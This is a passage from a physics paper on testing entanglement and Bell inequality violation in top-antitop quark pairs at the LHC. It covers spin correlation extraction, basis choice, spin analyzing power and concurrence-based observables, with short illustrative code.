sub-system \({\cal B}\). The other terms are measured in a likewise manner. A quantum state of a bipartite system that violates Eq. (13) exhibits Bell inequality violation (or is Bell non-local). For the case where the two qubits are spins, \(A_{1}\) and \(A_{2}\) can indicate the quantization axes along which the spin of qubit \(\mathcal{A}\) is measured while \(B_{1}\) and \(B_{2}\) can indicate the axes along which the spin of qubit \(\mathcal{B}\) is measured. For instance the choice of \[A_{1}=\sigma_{3},\qquad A_{2}=\sigma_{1},\qquad B_{1}=-\frac{1}{\sqrt{2}}( \sigma_{1}+\sigma_{3}),\qquad B_{2}=\frac{1}{\sqrt{2}}(\sigma_{1}-\sigma_{3}), \tag{14}\] when applied to the Bell state \(\psi_{\rm Bell}=(|01\rangle-|10\rangle)/\sqrt{2}\) violates the CHSH inequality. Given a quantum state, it is crucial to choose the optimal axes in order to determine if a quantum state violates the CHSH inequality, via Eq. (13). It has been shown that while using the optimal axes, the left-hand side of Eq. (13) becomes \(2\sqrt{\lambda_{1}+\lambda_{2}}\), where \(\lambda_{1}\) and \(\lambda_{2}\) are the two largest eigenvalues of \(C^{T}C\)[40]. In a collider environment, however, this method can lead to a biased estimation [5; 6]. For simplicity we will choose the fixed axes [8] \[A_{1}=\sigma_{3},\qquad A_{2}=\sigma_{1},\qquad B_{1}=\pm\frac{1}{\sqrt{2}}( \sigma_{3}+\sigma_{1}),\qquad B_{2}=\pm\frac{1}{\sqrt{2}}(-\sigma_{3}+\sigma_{ 1}). \tag{15}\] For this choice the CHSH inequality becomes \[|C_{33}\pm C_{11}|<\sqrt{2}. \tag{16}\] In a similar way to entanglement, we can cast this into an observable as \[\mathcal{O}_{B}^{\pm}=\pm(C_{33}+C_{11})-\sqrt{2},\qquad\text{and}\qquad \langle\mathcal{O}_{B}^{\pm}\rangle>0\quad\text{for Bell inequality violation}. \tag{17}\] Whether the \(+\) or \(-\) is used depends on the predicted value of \(C_{33}+C_{11}\). Finally, we make a comment about the generality of the Bell inequality violation test that can be performed at a collider. 
In the 1990's, it was suggested that Bell inequality violation could be observed at \(e^{+}e^{-}\) colliders in the \(\tau^{+}\tau^{-}\) final state [33; 34; 35]. The conclusion of Ref. [35] was that Bell inequality violation was not observable at a collider because quantities measured at colliders are commuting while non-commuting quantities are required to violate a Bell inequality. In this work, we do not perform a fully general test of Bell's inequality. Instead, we first identify a quantum state, and then ask whether it is a quantum state that does or does not violate Bell's inequality. The non-commutation arises from our assumption that we are working with a quantum state and thus gain access to spins. ## 3 The Top-Antitop System at Hadron Colliders In this section, we cover the details that are necessary to identify the \(t\bar{t}\) final state at the LHC as a quantum state. ### Two-Body Production at Hadron Colliders Consider the two-to-two scattering process \({\cal X}{\cal Y}\to{\cal AB}\). The rate for this process is given by the cross section \(\sigma({\cal X}{\cal Y}\to{\cal AB})\) and is calculated by taking the matrix element \({\cal M}({\cal X}{\cal Y}\to{\cal AB})\), squaring it, and integrating it over phase space \({\rm d}\Pi\). The initial state spins (and other quantum numbers) are averaged, and when the final state spins are not measured they are summed. Schematically \[\sigma({\cal X}{\cal Y}\to{\cal AB})=\int{\rm d}\Pi\ \overline{\sum_{\rm initial }}\ \sum_{ab,\bar{a}\bar{b}}{\cal M}({\cal X}{\cal Y}\to{\cal AB})_{a\bar{a}}{\cal M }^{*}({\cal X}{\cal Y}\to{\cal AB})_{b\bar{b}}, \tag{10}\] where \(ab\) is the spin index of particle \({\cal A}\), \(\bar{a}\bar{b}\) is the spin index of particle \({\cal B}\), and \(\overline{\sum}\) indicates averaging. The _production spin density matrix_ is \[R_{ab,\bar{a}\bar{b}}=\overline{\sum_{\rm initial}}{\cal M}({\cal X}{\cal Y} \to{\cal AB})_{a\bar{a}}{\cal M}^{*}({\cal X}{\cal Y}\to{\cal AB})_{b\bar{b}}, \tag{11}\] such that \[\sigma({\cal X}{\cal Y}\to{\cal AB})=\int{\rm d}\Pi\sum_{ab,\bar{a}\bar{b}}R_ {ab,\bar{a}\bar{b}}. \tag{12}\] Taking the trace of \(R_{ab,\bar{a}\bar{b}}\) and performing the phase space integral gives the cross section, while the full matrix provides differential spin information. When particles \({\cal A}\) and \({\cal B}\) are both spin-1/2, the matrix \(R_{ab,\bar{a}\bar{b}}\) is a \(4\times 4\) matrix and can be decomposed into the Pauli basis according to Eq. (3).3 Footnote 3: The normalization for a production spin density matrix \(R\) is \({\rm tr}(R)=d\sigma/d\Pi\) while the normalization for a quantum state \(\rho\) is \({\rm tr}(\rho)=1\). If particle \({\cal A}\) decays, the _decay spin density matrix_ carries the differential spin information of particle \({\cal A}\). Consider the three-body decay of \({\cal A}\to a_{1}a_{2}a_{3}\) \[\Gamma^{\cal A}_{ab}={\cal M}({\cal A}\to a_{1}a_{2}a_{3})_{a}{\cal M}^{*}({ \cal A}\to a_{1}a_{2}a_{3})_{b}, \tag{13}\] where again \(ab\) is the spin index of particle \({\cal A}\). In the narrow width approximation the production and decay can be described together \[\sigma({\cal X}{\cal Y}\to{\cal AB}\to(a_{1}a_{2}a_{3})(b_{1}b_{2}b_{3}))=\int {\rm d}\Pi\ \sum_{ab,\bar{a}\bar{b}}(\Gamma^{\cal A}_{ab}\ R_{ab,\bar{a}\bar{b}}\ \Gamma^{\cal B}_{\bar{a}\bar{b}}). 
\tag{14}\] The final state phase space can be partially integrated over to find \[\begin{split}\int{\rm d}\Pi\ \sum_{ab,\bar{a}\bar{b}}(\Gamma^{ \cal A}_{ab}\ R_{ab,\bar{a}\bar{b}}\ \Gamma^{\cal B}_{\bar{a}\bar{b}})&=\int{\rm d}\Omega^{\cal A}{ \rm d}\Pi^{\cal A}{\rm d}\Omega^{\cal B}{\rm d}\Pi^{\cal B}\ \sum_{ab,\bar{a}\bar{b}}(\Gamma^{ \cal A}_{ab}\ R_{ab,\bar{a}\bar{b}}\ \Gamma^{\cal B}_{\bar{a}\bar{b}}),\\ &=\int{\rm d}\Omega^{\cal A}{\rm d}\Omega^{\cal B}\ \sum_{ab,\bar{a}\bar{b}}(\tilde{\Gamma}^{\cal A}_{ab}\ R_{ab,\bar{a}\bar{b}}\ \tilde{\Gamma}^{\cal B}_{\bar{a}\bar{b}}).\end{split} \tag{15}\] The total phase space \(\mathrm{d}\Pi\) is divided into the angular phase space of one of the decay products of particle \(\mathcal{A}\): \(\mathrm{d}\Omega^{\mathcal{A}}\), the angular phase space of one of the decay products of particle \(\mathcal{B}\): \(\mathrm{d}\Omega^{\mathcal{B}}\), the remaining phase space of the decay products of particle \(\mathcal{A}\): \(\mathrm{d}\Pi^{\mathcal{A}}\), and remaining phase space of the decay products of particle \(\mathcal{B}\): \(\mathrm{d}\Pi^{\mathcal{B}}\). The angular space is two-dimensional \((\theta,\phi)\) but we write it as a three-vector \(\Omega_{i}=(\cos\phi\sin\theta,\sin\phi\sin\theta,\cos\theta)\) to represent the direction of the decay product of interest. Here, \(\theta\) is the polar angle and \(\phi\) is the azimuthal angle with respect to a reference direction. While \(\Gamma^{\mathcal{A}}_{ab}\) is the decay spin density matrix for particle \(\mathcal{A}\), \(\tilde{\Gamma}^{\mathcal{A}}_{ab}\) is the partially integrated decay width that leaves the angular space of one of the decay products unintegrated. It can be decomposed as in Eq. (2) to \(\tilde{\Gamma}^{\mathcal{A}}_{ab}\propto\delta_{ab}+\sum_{i}B^{\mathcal{A}}_{ i}\sigma_{i,ab}\) where \(B^{\mathcal{A}}_{i}\) is the net polarization of particle \(\mathcal{A}\). Performing the calculation of \(\tilde{\Gamma}^{\mathcal{A}}_{ab}\) in the rest frame of particle \(\mathcal{A}\) leads to \[\tilde{\Gamma}^{\mathcal{A}}_{ab}(\Omega_{i})=\frac{1}{2}\Gamma^{A}\Big{(} \delta_{ab}+\sum_{i}B^{\mathcal{A}}(\kappa\Omega_{i})\sigma_{i,ab}\Big{)}, \tag{10}\] where \(\Gamma^{\mathcal{A}}\) is proportional to the decay width of \(\mathcal{A}\to a_{1}a_{2}a_{3}\), \(B^{\mathcal{A}}\) is the magnitude of the polarization of particle \(\mathcal{A}\), and \(\kappa\) is called the _spin analyzing power_ and is associated with the decay particle that has been left unintegrated. The value of \(\kappa\) is between \(-1\) and \(1\) and describes how correlated a decay product is with the spin of the mother particle. Writing the decay spin density matrix according to Eq. (10), decomposing the production spin density matrix according to Eq. (3), and summing over \(ab,\bar{a}\bar{b}\) in Eq. 
(11), the differential cross section can be written as \[\frac{1}{\sigma}\frac{\mathrm{d}^{4}\sigma}{\mathrm{d}^{2}\Omega^{\mathcal{A}}\mathrm{d}^{2}\Omega^{\mathcal{B}}}=\frac{1}{(4\pi)^{2}}\bigg{(}1+\sum_{i}\big{(}\kappa^{\mathcal{A}}\,B^{\mathcal{A}}_{i}\Omega^{\mathcal{A}}_{i}+\kappa^{\mathcal{B}}\,B^{\mathcal{B}}_{i}\Omega^{\mathcal{B}}_{i}\big{)}+\sum_{i,j}\kappa^{\mathcal{A}}\kappa^{\mathcal{B}}\,\Omega^{\mathcal{A}}_{i}C_{ij}\Omega^{\mathcal{B}}_{j}\bigg{)}, \tag{11}\] where the angle \(\Omega^{\mathcal{A}}_{i}\) (\(\Omega^{\mathcal{B}}_{j}\)) is evaluated in the rest frame of particle \(\mathcal{A}\) (\(\mathcal{B}\)) relative to the \(i^{\mathrm{th}}\) (\(j^{\mathrm{th}}\)) axis of a chosen basis. To extract individual parameters, one can select which angular integrals to perform. For example, to extract a component of the spin correlation matrix \(C_{ij}\), one integrates over \(\phi^{\mathcal{A}}\) and \(\phi^{\mathcal{B}}\) to obtain \[\frac{1}{\sigma}\frac{\mathrm{d}\sigma}{\mathrm{d}\cos\theta^{\mathcal{A}}_{i}\,\mathrm{d}\cos\theta^{\mathcal{B}}_{j}}=\frac{1}{4}\left(1+\kappa^{\mathcal{A}}B^{\mathcal{A}}_{i}\cos\theta^{\mathcal{A}}_{i}+\kappa^{\mathcal{B}}B^{\mathcal{B}}_{j}\cos\theta^{\mathcal{B}}_{j}+\kappa^{\mathcal{A}}\kappa^{\mathcal{B}}C_{ij}\cos\theta^{\mathcal{A}}_{i}\cos\theta^{\mathcal{B}}_{j}\right), \tag{12}\] where \(\theta^{\mathcal{A}}_{i}\) (\(\theta^{\mathcal{B}}_{j}\)) is the angle between the momentum of the decay product of particle \(\mathcal{A}\) (\(\mathcal{B}\)) and the \(i^{\mathrm{th}}\) (\(j^{\mathrm{th}}\)) axis, in the rest frame of particle \(\mathcal{A}\) (\(\mathcal{B}\)). This distribution can be transformed to \[\frac{1}{\sigma}\frac{\mathrm{d}\sigma}{\mathrm{d}(\cos\theta^{\mathcal{A}}_{i}\cos\theta^{\mathcal{B}}_{j})}=-\frac{1}{2}\left(1+\kappa^{\mathcal{A}}\kappa^{\mathcal{B}}C_{ij}\cos\theta^{\mathcal{A}}_{i}\cos\theta^{\mathcal{B}}_{j}\right)\log\big{|}\cos\theta^{\mathcal{A}}_{i}\cos\theta^{\mathcal{B}}_{j}\big{|}. \tag{13}\] Thus, measuring the angles of the decay products measures parameters of the production spin density matrix. We mention three ways to extract the value of \(C_{ij}\) from data using Eq. (3.10). The first way is to simply perform a fit to the differential cross section. The second way is to compute the asymmetry of the distribution. The asymmetry \(A\) for a variable \(x\) is \[A_{x}=\frac{N_{x}^{+}-N_{x}^{-}}{N_{x}^{+}+N_{x}^{-}}, \tag{3.11}\] where \(N_{x}^{+}\) (\(N_{x}^{-}\)) is the number of events with \(x>0\) (\(x<0\)): \[N_{x}^{+}=\int_{0}^{x_{\rm max}}\frac{1}{\sigma}\frac{\mathrm{d}\sigma}{\mathrm{d}x}\mathrm{d}x,\qquad\quad N_{x}^{-}=\int_{x_{\rm min}}^{0}\frac{1}{\sigma}\frac{\mathrm{d}\sigma}{\mathrm{d}x}\mathrm{d}x. \tag{3.12}\] When the asymmetry variable is \(x=\cos\theta_{i}^{\mathcal{A}}\cos\theta_{j}^{\mathcal{B}}\) then \(x_{\rm max}=1\) and \(x_{\rm min}=-1\). This method works because \(C_{ij}\) multiplies the component of the differential cross section that is an odd function with respect to \(\cos\theta_{i}^{\mathcal{A}}\cos\theta_{j}^{\mathcal{B}}\). Each spin correlation matrix entry \(C_{ij}\) is then \[C_{ij}=\frac{4}{\kappa^{\mathcal{A}}\kappa^{\mathcal{B}}}\left(A_{\cos\theta_{i}^{\mathcal{A}}\cos\theta_{j}^{\mathcal{B}}}\right). \tag{3.13}\] The third way to extract \(C_{ij}\) is to compute the mean of the distribution in Eq. (3.10) since \(\langle\cos\theta_{i}^{A}\cos\theta_{j}^{B}\rangle\propto C_{ij}\), where the constant of proportionality depends on the distribution.
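To make the asymmetry method concrete, a minimal numerical sketch of Eqs. (3.11)-(3.13) is given below. The toy event sample, the spin analyzing powers, and the function names are illustrative assumptions only; this is not the analysis code used in this work.

```python
import numpy as np

def asymmetry(x):
    """A_x = (N+ - N-) / (N+ + N-) for a sample of the variable x."""
    n_plus = np.sum(x > 0)
    n_minus = np.sum(x < 0)
    return (n_plus - n_minus) / (n_plus + n_minus)

def extract_Cij(cos_theta_A, cos_theta_B, kappa_A, kappa_B):
    """Estimate C_ij from per-event decay angles via C_ij = 4 A / (kappa_A kappa_B)."""
    x = cos_theta_A * cos_theta_B
    return 4.0 * asymmetry(x) / (kappa_A * kappa_B)

# Toy closure test: sample (cosA, cosB) from the normalized density
#   (1 + kappa_A kappa_B C cosA cosB) / 4 on [-1, 1]^2
# with accept-reject, then recover C from the asymmetry of cosA * cosB.
rng = np.random.default_rng(0)
kappa_A, kappa_B, C_true = 1.0, 0.64, -0.4
n = 400_000
a = rng.uniform(-1, 1, n)
b = rng.uniform(-1, 1, n)
keep = rng.uniform(0, 2, n) < 1 + kappa_A * kappa_B * C_true * a * b  # accept-reject
cosA, cosB = a[keep], b[keep]
print(extract_Cij(cosA, cosB, kappa_A, kappa_B))  # statistically close to C_true = -0.4
```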
The variance of the mean is smaller than the variance of the asymmetry, however, the asymmetry is more robust to systematic uncertainties. In our study we utilize the asymmetry. ### The \(t\bar{t}\) System as a Quantum State Consider the \(t\bar{t}\) final state as a bipartite qubit system with the spin of the top and anti-top identified as each qubit. Then each event at the LHC is a single measurement of this quantum state. Each event can also be called a quantum sub-state. Let the quantum state that describes the \(t\bar{t}\) system be \(\rho\). The kinematics of the \(t\bar{t}\) system are characterized by the invariant mass, \(m_{t\bar{t}}\), of the top-anti-top pair and by the angle, \(\theta\), of the top momentum (in the \(t\bar{t}\) center-of-mass frame) relative to the beam. The quantum state for a single point in this phase space is \(\rho(m_{t\bar{t}},\theta)\), while more generally, integrating over a region \(\Pi\) leads to the quantum state \(\rho_{\Pi}\)[4]. At a hadron collider, the two partonic processes, at leading order, that produce \(t\bar{t}\) are \(q\bar{q}\) and \(gg\). This means that \(\rho\) is necessarily a mixed state where the coefficients, as in Eq. (2.1), are given by the relative parton luminosities [4]. Additionally, we can identify the production spin density matrix, Eq. (3.2), as a quantum density matrix for a sub-state (for a given initial partonic state) when normalized correctly and evaluated in a fixed basis [4]. The ideal final state would be the exclusive production of \(t\bar{t}\) since additional radiation can disrupt the spin correlations between the \(t\) and \(\bar{t}\). In this study, we work at leading order and leave higher order effects to future work. In the context of spin correlations, higher order effects have been studied and are known to modify spin correlations at the \(10-30\%\) level [41]. The main backgrounds for \(t\bar{t}\) in the semi-leptonic channel are single top, \(W+\) jets, multijet, \(t\bar{t}W\), \(t\bar{t}Z\), and \(t\bar{t}h\). Altogether the background has a cross section that is \(\approx 10\%\) of the size of the signal when two \(b\)-tags are required [42; 43]. In the boosted region this reduces to \(\approx 4\%\)[44; 45]. In this work the impact of backgrounds is neglected and left to future work. In Bell inequality tests, loopholes often exist and the \(t\bar{t}\) system is no exception. In some events, the top and anti-top decay while inside of each other's light cones. This is an example of the locality loophole. As the invariant mass \(m_{t\bar{t}}\) of the \(t\bar{t}\) system increases, the fraction of events which are space-like separated when decaying approaches 100% and is already at 90% for \(m_{t\bar{t}}>800\) GeV [6]. Another loophole is the fair sampling loophole which asserts that if the detection efficiency is low then a violation of Bell's inequality could be faked. The fair sampling loophole, as well as others, are expected to be difficult to address at colliders. #### Spin Correlations The \(t\bar{t}\) system has been studied for many years. In 1988 it was known that when produced via the strong force (\(gg\) and \(q\bar{q}\)), neither the tops nor anti-tops are polarized at leading order, but that spin correlations exist between the top and anti-top [10]. Furthermore, these spin correlations can be observed by the angular separations between the top and anti-top decay products [11; 12]. 
The \(gg\) and \(q\bar{q}\) initial states give rise to different spin correlation behavior which is also the reason that the LHC and the Tevatron are very complementary probes of this system. The heuristic intuition for the spin correlations is that near threshold the spins of the top and anti-top are aligned along the beamline direction. The possible outgoing spin configurations are controlled by the incoming spins. For the \(q\bar{q}\) initial state the \(q\) and \(\bar{q}\) have opposite helicity with the spins aligned along the beam axis. Near threshold the top and anti-top have mostly opposite helicity with spins aligned along the beam axis, leading to a configuration with a spin-triplet contribution. At high \(p_{T}\), the top and anti-top are still opposite in helicity but their spin axes become aligned with their direction of motion. In between the threshold region and the high \(p_{T}\) region, the spin axes of the top and anti-top interpolate between these directions [13; 14]. The basis for choosing the spin axes is called the off-diagonal basis and has been shown to optimize the spin correlations from \(q\bar{q}\) production. The situation is different for \(gg\) production. Incoming pairs of gluons can have the same helicity or the opposite helicity. Near threshold same-helicity gluons dominate and the outgoing top and anti-top have the same helicity with the spin axes aligned along the beam axis, leading to a configuration with a spin-singlet contribution, in contrast to the \(q\bar{q}\) case. At high \(p_{T}\), the opposite-helicity gluons dominate and the outgoing top and anti-top have opposite helicity with the spin axes becoming aligned along their direction of motion, leading to a spin-triplet configuration, which is the same as the \(q\bar{q}\) case. The optimal choice of spin axes for optimizing spin correlations is aligned along the direction of the top and anti-top [14; 15; 46]. #### Basis Choice When calculating spin correlations, it is necessary to choose a basis along which to measure the spins. One common choice is the fixed beam basis which starts from the center-of-mass frame of the \(t\bar{t}\) system and uses \(\{\hat{x},\hat{y},\hat{z}\}\) where \(\hat{z}\) points along the beam and \(\hat{x}\) and \(\hat{y}\) are fixed in the plane transverse to the beam. Another common choice is the helicity basis which starts from the center-of-mass frame and defines \(\{\hat{r},\hat{k},\hat{n}\}\) where \(\hat{k}\) points along the top quark three-momentum. Then \[\hat{r} =\frac{1}{\sin\theta}(\hat{z}-\cos\theta\hat{k}), \tag{3.14a}\] \[\hat{n} =\hat{r}\times\hat{k}, \tag{3.14b}\] where \(\hat{r}\) is the component of the beam direction that is orthogonal to \(\hat{k}\), \(\hat{n}\) is the remaining orthogonal direction, and \(\cos\theta=\hat{k}\cdot\hat{z}\). Figure 1 illustrates these two bases.4 Footnote 4: We calculate angles for both the top and anti-top using the axes \(\{\hat{r},\hat{k},\hat{n}\}\) where \(\hat{k}\) is defined by the top quark. Sometimes in other studies the angles for decay products from the anti-top are defined relative to a second set of axes defined by the anti-top. At the LHC, at threshold the fixed beam basis has the largest spin correlations while in the high-\(p_{T}\) regime, the helicity basis has the largest correlations [47]. At high-\(p_{T}\) the helicity basis is nearly optimal for entanglement and Bell inequality violation too [48]. 
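For concreteness, the helicity-basis axes of Eq. (3.14) can be constructed event-by-event from the top-quark direction in the \(t\bar{t}\) center-of-mass frame. The short sketch below, with an illustrative top direction, is one way to do this; it is not the code used in this work.

```python
import numpy as np

def helicity_basis(k_hat, z_hat=np.array([0.0, 0.0, 1.0])):
    """Return (r_hat, k_hat, n_hat) given the unit vector k_hat along the top
    momentum in the t-tbar center-of-mass frame and the beam direction z_hat.
    The basis is ill-defined when k_hat is exactly along the beam (sin(theta) = 0)."""
    cos_theta = np.dot(k_hat, z_hat)
    sin_theta = np.sqrt(1.0 - cos_theta**2)
    r_hat = (z_hat - cos_theta * k_hat) / sin_theta   # beam component orthogonal to k_hat
    n_hat = np.cross(r_hat, k_hat)                    # remaining orthogonal direction
    return r_hat, k_hat, n_hat

# Example: a top direction at polar angle theta = 60 degrees from the beam
theta = np.radians(60.0)
k_hat = np.array([np.sin(theta), 0.0, np.cos(theta)])
r_hat, k_hat, n_hat = helicity_basis(k_hat)
print(np.dot(r_hat, k_hat), np.dot(n_hat, k_hat))  # both ~0: orthonormal basis
```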
One very important note is that constructing the total \(t\bar{t}\) quantum state (_i.e._ quantum tomography) requires a fixed basis for all of the events [4, 7, 48]. In a fixed basis, the axes are the same for each event which means that each event is a single measurement of a parameter of Eq. (2.3). Using many events then increases the accuracy of the measurement of the \(t\bar{t}\) quantum state. Figure 1: Illustration of the fixed beam basis \(\{\hat{x},\hat{y},\hat{z}\}\) and the helicity basis \(\{\hat{r},\hat{k},\hat{n}\}\). The incoming beams are blue and the outgoing top and anti-top are orange. \(\theta\) is the polar angle between the \(\hat{z}\)-axis (the beam direction) and the \(\hat{k}\)-axis (the top quark momentum direction). The helicity basis, by contrast, is not a fixed basis because the axes change event-by-event. Performing the summation over many events does not measure a parameter of Eq. (3) but rather its expectation value [7; 48] since the basis is different event-by-event. Thus in the helicity basis, the summation over events does not produce a quantum state, but is simply a summation over events. In Ref. [7] this sum was labelled a "fictitious state." Showing that a fictitious state is entangled does not show that the associated \(t\bar{t}\) quantum state is entangled, but it does show that there exists a sub-state (both of the fictitious state and of the associated quantum state) that is entangled. This follows from the fact that both the quantum state and fictitious states are convex sums and the positivity of concurrence. The same considerations apply to Bell inequality violation. Appendix D provides a proof of this statement, as well as more discussion on fictitious states (Ref. [48] provides additional details). In our study we use the helicity basis for both concurrence and CHSH violation which means our results indicate the presence of entanglement and of Bell inequality violation, but not the strength. In the high-\(p_{T}\) region, these are naively not detectable using the fixed beam basis. ### Spin Analyzing Power As seen in Eq. (3.10) the measured value of spin correlations is impacted linearly by the spin analyzing power \(\kappa^{\mathcal{A}}\) from the decay of particle \(\mathcal{A}\) and the spin analyzing power \(\kappa^{\mathcal{B}}\) from the decay of particle \(\mathcal{B}\). To maximize the sensitivity and significance, the daughter particle with the largest spin analyzing power should be used. When the top decays leptonically, the anti-lepton (\(\ell^{+}\)) has \(\kappa=1.00\) which is maximally correlated with the spin of the top quark. In the fully leptonic channel of the \(t\bar{t}\) system the lepton and the anti-lepton are used which results in maximal correlation. In the semi-leptonic channel, that we study here, one side of the \(t\bar{t}\) system decay hadronically. In the hadronic decay of the top, there is a \(b\)-jet and two light flavor jets, one of which is initiated by an up-type quark and one of which is initiated by a down-type quark. If the down-type-initiated jet could be identified, then the maximal correlation of \(\kappa=1.00\) would be maintained because the leading order matrix element for the down quark and lepton in top decays is the same. Unfortunately, this is usually not possible. One can consider charm tagging since charm quarks are present in half of the hadronic top decays. It turns out that the charm tagging rate is not high enough for this to be better than the optimal hadronic method that we use. 
The required charm tagging rate is calculated in Appendix E.5 In any case, in many studies of top spin correlations the softer of the two jets was used since one expects that down-type-initiated jet is more often the softer one. This yields a spin analyzing power of \(\kappa=0.50\). Using the \(b\)-jet is not ideal because its spin analyzing power is \(\kappa=0.40\). Footnote 5: Another possibility would be incorporating measurements of jet charge, however, this seems challenging [49; 50]. The optimal spin analyzing power, assuming that one cannot distinguish the up-type-initiated and down-type-initiated jets, was calculated in Ref. [51]. They find an integrated value of \(\kappa_{\rm opt}=0.64\) when one uses a weighted sum of the two jets whose four-vectors are labelled as \(\vec{p}_{\rm soft}\) and \(\vec{p}_{\rm hard}\). The optimal hadronic value is given by using the four-vector \(\vec{p}_{\rm opt}\) which is \[\vec{p}_{\rm opt}(\cos\theta_{W})=P_{d\to p_{\rm soft}}(\cos\theta_{W})\,\hat{ p}_{\rm soft}+P_{d\to p_{\rm hard}}(\cos\theta_{W})\,\hat{p}_{\rm hard}, \tag{3.15}\] where \(\theta_{W}\) is the angle between the momentum of the \(d\)-quark and the momentum axis of the \(W\) in the rest frame of the \(W\) (see Fig. 2). The function \(P_{d\to p_{\rm soft}}(\cos\theta_{W})\) is the probability that the \(d\) quark is the softer jet and \(P_{d\to p_{\rm hard}}(\cos\theta_{W})\) is the probability that the \(d\) quark is the harder jet. These functions are given in Appendix C. The optimal direction for the hadronic decay of anti-top quark is defined likewise and the resulting spin analyzing power is \(\kappa_{\rm opt}=-0.64\). When extracting the components of the spin correlation matrix via Eq. (3.13) in the semi-leptonic channel one of the spin analyzing powers is given by the lepton and one is given by the optimal hadronic direction. ### Entanglement in \(t\bar{t}\) For a general bipartite quantum state, the 15 values of \(B_{i}^{\cal A}\), \(B_{i}^{\cal B}\), and \(C_{ij}\) need to be specified. In the \(t\bar{t}\) system at leading order, \(B_{i}^{\cal A}=0\) and \(B_{i}^{\cal B}=0\) for all \(i\), and \(C_{ij}=C_{ji}\)[52]. Furthermore, in the helicity basis, where \(1=\hat{r}\), \(2=\hat{k}\), and \(3=\hat{n}\), only \(C_{12}\) is non-zero leading to a set of only 4 parameters: \(C_{11}\), \(C_{22}\), \(C_{33}\), and \(C_{12}\). With only these parameters, a subset of the list of sufficient conditions generated by the PPT criterion can be shown to be a set of necessary conditions [8] \[|C_{11}+C_{22}| >1+C_{33}, \tag{3.16a}\] \[|4C_{12}^{2}+(C_{11}-C_{22})^{2}|^{1/2} >1-C_{33}. \tag{3.16b}\] Figure 2: Illustration of the top decay system in the rest frame of the \(t\) (left) and rest frame of the \(W\) (right). Between the down-type anti-quark and the up-type quark in the \(t\) rest frame, the down-type anti-quark tends to be softer while the up-type quark tends to be harder. Instead of \(\{C_{11},C_{22},C_{33},C_{12}\}\), one can use the three eigenvalues of the \(C\) matrix \(\{C_{1},C_{2},C_{3}\}\). Using these Eq. (3.16) becomes \[|C_{1}+C_{2}| >1+C_{3}, \tag{3.17a}\] \[|C_{1}-C_{2}| >1-C_{3}. \tag{3.17b}\] These conditions can be shown to be directly related to the concurrence \[\mathcal{C}(\rho)=\left\{\begin{array}{ll}\frac{1}{2}{\rm max}(|C_{1}+C_{2}| -1-C_{3},0),&C_{3}\leq 0\\ \frac{1}{2}{\rm max}(|C_{1}-C_{2}|-1+C_{3},0),&C_{3}\geq 0\end{array}\right. 
\tag{3.18}\] where the necessary and sufficient condition for entanglement becomes the usual \(\mathcal{C}(\rho)>0\). The concurrence for \(t\bar{t}\) is shown in Fig. 3 as a function of phase space position \((\theta,m_{t\bar{t}})\) generated at parton-level at 13 TeV with no phase space cuts applied. There is one region of sizable entanglement near threshold (due to like-helicity gluons producing a spin-singlet state) and a second region at high boost and large \(\theta\) (due to unlike-helicity gluons producing a spin-triplet state). Since we have specified the final state to be \(t\bar{t}\), for a given phase space region we can identify which case of Eq. (3.16a) applies. This can be done either semi-analytically through the spin production matrix in Eq. (3.2) or numerically from Fig. 3. Consider first the entangled region near threshold. Here \(C_{11}<0\), \(C_{22}<0\), and \(C_{33}<0\), therefore by Eq. (3.18) the inequality is \[-C_{11}-C_{22}-C_{33}-1>0. \tag{3.19}\] Figure 3: Concurrence \(\mathcal{C}(\rho)\) of the \(t\bar{t}\) system at parton-level in the \(\theta-m_{t\bar{t}}\) plane at \(\sqrt{s}=13\) TeV with no phase space cuts. Entanglement is indicated by a value \(\mathcal{C}(\rho)>0\). In the boosted region \(C_{11}>0\), \(C_{22}>0\), and \(C_{33}<0\), which leads to the inequality \[C_{11}+C_{22}-C_{33}-1>0. \tag{3.20}\] Converting these into operators, like in Eq. (2.10), we find \[D=\frac{1}{3}(C_{11}+C_{22}+C_{33}),\qquad D<-\frac{1}{3}\quad\text{for entanglement}, \tag{3.21}\] \[D_{3}=\frac{1}{3}(-C_{11}-C_{22}+C_{33}),\qquad D_{3}<-\frac{1}{3}\quad\text{for entanglement}. \tag{3.22}\] Through Eq. (3.8) both \(D\) and \(D_{3}\) can be related directly to measurements \[\frac{1}{\sigma}\frac{\text{d}\sigma}{\text{d}\cos\theta^{\mathcal{AB}}}=\frac{1}{2}(1+\kappa^{\mathcal{A}}\kappa^{\mathcal{B}}D\cos\theta^{\mathcal{AB}}), \tag{3.23}\] \[\frac{1}{\sigma}\frac{\text{d}\sigma}{\text{d}\cos\theta^{\prime\mathcal{AB}}}=\frac{1}{2}(1+\kappa^{\mathcal{A}}\kappa^{\mathcal{B}}D_{3}\cos\theta^{\prime\mathcal{AB}}), \tag{3.24}\] where the angles are given by \[\cos\theta^{\mathcal{AB}}=\sum_{i}\Omega_{i}^{\mathcal{A}}\Omega_{i}^{\mathcal{B}}, \tag{3.25}\] \[\cos\theta^{\prime\mathcal{AB}}=\sum_{i,j}\Omega_{i}^{\mathcal{A}}P_{ij}\Omega_{j}^{\mathcal{B}}. \tag{3.26}\] The vector \(\Omega_{i}^{\mathcal{A}}\) is the normalized three-momentum of the decay product of the top in the top rest frame and the vector \(\Omega_{i}^{\mathcal{B}}\) is the normalized three-momentum of the decay product of the anti-top in the anti-top rest frame. In the fully leptonic channel these would be the anti-lepton and lepton. In the semi-leptonic channel these would be the anti-lepton or lepton and the optimal hadronic direction defined in Sec. 3.3. The matrix \(P_{ij}\) is \(\text{diag}(-1,-1,1)\) [8]. Extracting \(D\) and \(D_{3}\) via the asymmetry yields \[D=\frac{4}{\kappa^{\mathcal{A}}\kappa^{\mathcal{B}}}\left(A_{\cos\theta^{\mathcal{AB}}}\right), \tag{3.27}\] \[D_{3}=\frac{4}{\kappa^{\mathcal{A}}\kappa^{\mathcal{B}}}\left(A_{\cos\theta^{\prime\mathcal{AB}}}\right). \tag{3.28}\] Measuring a quantity with a single observable was called the "direct" method in Ref. [8]. By contrast, measuring a quantity by first measuring each \(C_{ij}\) value individually, then combining them, was called the "individual" method. In the case of \((C_{11}+C_{22}+C_{33})/3\), using Eq. (3.27) is the direct method while using Eq. (3.13) is the individual method. Ref.
